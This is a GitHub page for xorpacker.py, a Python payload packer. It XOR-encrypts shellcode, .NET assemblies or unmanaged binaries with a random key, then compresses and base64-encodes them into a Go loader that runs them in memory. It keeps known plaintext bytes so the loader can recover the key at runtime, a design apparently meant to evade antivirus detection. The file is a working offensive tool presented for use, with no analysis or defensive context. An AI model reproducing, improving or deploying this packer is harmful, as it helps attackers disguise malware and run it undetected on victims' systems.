-
Notifications
You must be signed in to change notification settings - Fork 4
/
xorpacker.py
executable file
·84 lines (71 loc) · 2.61 KB
/
xorpacker.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import sys
import zlib
from base64 import b64encode
from random import randint
from struct import pack
from itertools import cycle
try:
import donut
except ImportError:
donut = None
import stub_shellcode_go
import stub_unmanaged_go
def xor(block):
key = randint(0,42949672)
key_tab = pack('<L',key)
encrypted = bytes(a ^ b for a, b in zip(block, cycle(key_tab)))
return encrypted
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Basic packer using XOR encryption', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-f', '--file', type=str, required=True, help='specify the payload file')
parser.add_argument('-t', '--type', type=str, choices=['SHELLCODE', 'MANAGED', 'UNMANAGED'], default='UNMANAGED', help='specify the payload type')
parser.add_argument('-a', '--arch', type=str, choices=['anyCPU', 'x64', 'x86'], default='anyCPU', help='specify the target architecture (only required for packing MANAGED code)')
args = parser.parse_args()
print()
print("[>] Payload file:", args.file)
print("[>] Payload type:", args.type)
if args.type == "MANAGED":
print("[>] Payload arch:", args.arch)
print()
if args.type == "MANAGED":
if donut is None:
print("[!] Python module 'donut-shellcode' is required for packing MANAGED code")
sys.exit(1)
print("[*] Generating shellcode...")
arch = 3
if args.arch == 'x86':
arch = 1
elif args.arch == 'x64':
arch = 2
payload = donut.create(file=args.file, arch=arch)
else:
payload = open(args.file, 'rb').read()
print("[*] Encrypting payload...")
encrypted = xor(payload)
print("[*] Compressing payload...")
encrypted = zlib.compress(encrypted)
print("[*] Encoding payload...")
encrypted = b64encode(encrypted).decode()
print("[*] Generating source file...")
plain = payload[128:132]
known_bytes = b64encode(plain).decode()
if args.type == "SHELLCODE" or args.type == "MANAGED":
source = stub_shellcode_go.loader.format(encrypted, known_bytes)
else:
source = stub_unmanaged_go.loader.format(encrypted, known_bytes)
repl = '''/*
#cgo CFLAGS: -IMemoryModule
#cgo LDFLAGS: MemoryModule/build/MemoryModule.a
#include "MemoryModule/MemoryModule.h"
*/
import "C"
'''
source = source.replace('import "C"', repl)
with open('payload.go', 'w') as f:
f.write(source)
f.close()
print()
print("[>] You should now build payload.go")